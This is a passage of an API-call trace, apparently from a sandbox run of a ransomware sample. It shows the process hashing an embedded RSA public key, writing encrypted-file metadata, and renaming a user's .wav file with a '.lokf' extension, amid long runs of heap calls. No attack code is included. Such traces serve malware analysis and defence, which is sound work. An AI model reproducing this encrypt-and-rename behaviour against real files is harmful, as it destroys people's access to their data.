KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.902] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.902] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.902] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0060.903] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.903] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.903] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.903] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.903] GetLastError () returned 0x0 [0060.903] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.903] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0060.903] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.903] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.903] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.903] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.904] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x2420, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.904] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.904] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.904] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.904] CloseHandle (hObject=0x5cc) returned 1 [0060.905] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228c60 [0060.905] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0060.905] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\JkVomBM7vh9EmuD_aJp\\WsOPu73F.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\jkvombm7vh9emud_ajp\\wsopu73f.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\JkVomBM7vh9EmuD_aJp\\WsOPu73F.wav.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\jkvombm7vh9emud_ajp\\wsopu73f.wav.lokf")) returned 1 [0060.906] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fd37b00, ftCreationTime.dwHighDateTime=0x1d4d0d8, ftLastAccessTime.dwLowDateTime=0xbd1c9840, ftLastAccessTime.dwHighDateTime=0x1d4d100, ftLastWriteTime.dwLowDateTime=0xbd1c9840, ftLastWriteTime.dwHighDateTime=0x1d4d100, nFileSizeHigh=0x0, nFileSizeLow=0x2420, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WsOPu73F.wav", cAlternateFileName="")) returned 0 [0060.906] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0060.906] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0060.906] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262c78 | out: hHeap=0x660000) returned 1 [0060.906] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0060.906] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262c78 [0060.906] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0060.906] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.906] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.906] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.906] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.907] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.907] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.907] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.907] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.907] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.907] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.907] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.907] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.907] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.907] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.907] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.907] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.907] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.907] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.907] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.907] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.907] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.907] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.907] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.907] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.907] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.907] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.907] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0060.907] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.907] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.907] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.907] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.907] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.907] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.907] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.907] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.907] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.907] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.908] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.908] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.908] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.908] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.908] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.908] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.908] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.908] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.908] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.908] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.908] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.908] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.908] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.908] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.908] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.908] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.908] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.908] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.908] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.908] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.940] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.940] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.940] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.940] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.940] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.940] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.940] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.940] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.940] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.940] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.940] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.940] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.940] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.940] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.940] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.940] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.940] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.940] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.940] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.940] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.940] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.940] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.940] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.940] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.940] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.940] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.940] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.940] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.940] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.940] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.940] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.940] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.940] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.941] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.941] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.941] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.941] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.941] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.941] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.941] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.941] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.941] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.941] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.941] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.941] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.941] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0060.941] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.941] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.941] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.941] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.941] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.941] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.941] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.941] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.941] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.941] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.941] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.941] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.941] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.941] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.941] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.941] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.941] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.941] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.941] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.941] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.941] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.942] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.942] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.942] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.942] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.942] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.942] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.942] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.942] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.942] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.942] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.942] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.942] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.942] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.942] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.942] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.942] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.942] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.943] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.943] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.943] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.943] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.943] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.943] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.943] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.943] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.943] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.943] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.943] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.943] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.943] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.943] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.943] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.943] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.943] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.943] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.943] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.943] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.943] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.943] 